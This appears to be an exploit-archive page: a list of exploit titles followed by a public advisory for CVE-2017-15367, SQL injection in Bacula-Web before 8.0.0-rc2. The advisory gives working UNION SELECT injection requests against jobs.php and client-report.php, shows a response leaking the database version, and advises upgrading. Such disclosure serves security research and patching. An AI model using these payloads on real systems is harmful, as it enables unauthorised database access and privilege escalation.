
15 changes to exploits/shellcodes uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service μTorrent (uTorrent) / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC) μTorrent (uTorrent) 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC) uTorrent WebUI 0.370 - Authorisation Header Denial of Service μTorrent (uTorrent) WebUI 0.370 - Authorisation Header Denial of Service Memcached - 'memcrashed' Denial of Service Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (2) Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (1) Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service WebLog Expert Enterprise 9.4 - Denial of Service uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking μTorrent (uTorrent) 2.0.3 - 'plugin_dll.dll' DLL Hijacking uTorrent 2.0.3 - DLL Hijacking μTorrent (uTorrent) 2.0.3 - DLL Hijacking iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow Microsoft Office - 'Composite Moniker Remote Code Execution Mozilla Firefox - Address Bar Spoofing Tor (Firefox 41 < 50) - Code Execution Chrome 35.0.1916.153 - Sandbox Escape / Command Execution WebLog Expert Enterprise 9.4 - Authentication Bypass uTorrent 1.6 build 474 - 'announce' Key Remote Heap Overflow μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal T. Hauck Jana Server 1.0/1.45/1.46 - Directory Traversal Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution Werkzeug - 'Debug Shell' Command Execution TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal TikiWiki Project < 1.9.9 - 'tiki-listmovies.php' Directory Traversal toronja CMS - SQL Injection Toronja CMS - SQL Injection uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery μTorrent (uTorrent) WebUI 0.310 Beta 2 - Cross-Site Request Forgery tinybrowser - 'tinybrowser.php' Directory Listing tinybrowser - 'edit.php' Directory Listing TinyBrowser - 'tinybrowser.php' Directory Listing TinyBrowser - 'edit.php' Directory Listing Xoops 2.5.7.2 - Directory Traversal Bypass XOOPS 2.5.7.2 - Directory Traversal Bypass SAP BusinessObjects launch pad - Server-Side Request Forgery antMan < 0.9.1a - Authentication Bypass Bacula-Web < 8.0.0-rc2 - SQL Injection
55 lines
No EOL
1.7 KiB
Text
55 lines
No EOL
1.7 KiB
Text
# Exploit Title: Multiple SQL injection vulnerabilities in Bacula-Web
|
|
# Date: 2018-03-07
|
|
# Software Link: http://bacula-web.org/
|
|
# Exploit Author: Gustavo Sorondo
|
|
# Contact: http://twitter.com/iampuky
|
|
# Website: http://cintainfinita.com/
|
|
# CVE: CVE-2017-15367
|
|
# Category: webapps
|
|
|
|
1. Description
|
|
|
|
Bacula-web before 8.0.0-rc2 is affected by multiple SQL Injection
|
|
vulnerabilities that could allow an attacker to access the Bacula database
|
|
and, depending on configuration, escalate privileges on the server.
|
|
|
|
2. Proofs of Concept
|
|
|
|
2.1) The /jobs.php script is affected by a SQL Injection vulnerability.
|
|
|
|
The following GET request can be used to extract the result of "select
|
|
@@version" query.
|
|
|
|
Request:
|
|
GET
|
|
/jobs.php?status=0&level_id=&client_id=0&start_time=&end_time=&orderby=jobid&jobs_per_page=25&pool_id=11%27%20UNION%20ALL%20SELECT%20@@version%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23
|
|
HTTP/1.1
|
|
|
|
Response:
|
|
HTTP/1.1 200 OK
|
|
[...]
|
|
<td>5.7.19-0ubuntu0.16.04.1</td>
|
|
<td class="text-left">
|
|
backupjob-report.php?backupjob_name=
|
|
[...]
|
|
|
|
Other parameters (eg. client_id) are also vulnerable, since there is no
|
|
protection against SQL Injections at all.
|
|
|
|
2.2) The /backupjob-report.php script is affected by a SQL Injection
|
|
vulnerability.
|
|
|
|
The following GET request can be used to extract the result of "select
|
|
@@version" query.
|
|
|
|
Request:
|
|
GET
|
|
/client-report.php?period=7&client_id=21%20UNION%20ALL%20SELECT%20NULL,@@version%23
|
|
|
|
2.3) The /client-report.php is affected by a SQL Injection vulnerability in
|
|
the "client_id" parameter.
|
|
|
|
3. Solution:
|
|
|
|
Update to version 8.0.0-RC2
|
|
http://bacula-web.org/news-reader/bacula-web-8-0-0-rc2-released.html |